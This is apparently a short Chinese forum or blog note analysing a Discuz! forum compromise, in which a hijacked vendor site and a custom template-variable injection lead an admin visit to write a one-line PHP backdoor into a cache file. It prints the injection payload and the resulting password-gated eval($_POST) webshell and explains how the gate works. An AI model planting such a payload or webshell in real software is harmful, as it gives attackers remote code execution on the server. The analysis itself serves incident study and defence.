初步推测是劫持了customer.discuz.net 再配合自定义模板变量那个漏洞 管理员访问后台时 便会生成一个一句话后门。自定义模板变量:变 量 :
{’,”);ECHO ”;$X=SUBSTR(MD5($_GET[B]),28);IF($X==’7aaa’)EVAL($_POST[A]);//}
替换内容 : aaaaaaaaaa
/forumdata/cache/usergroup_0.php
程序代码:
< ?php (substr(md5($_POST[b]),28)==’7aaa’) && eval($_POST[a]);?>
对post的变量b进行md5加密,如果第28-31的位置是7aaa(32位MD5的后四位)的话 就执行eval($_POST[a]);
有一种缘,放手后成为风景,有一颗心,坚持中方现真诚。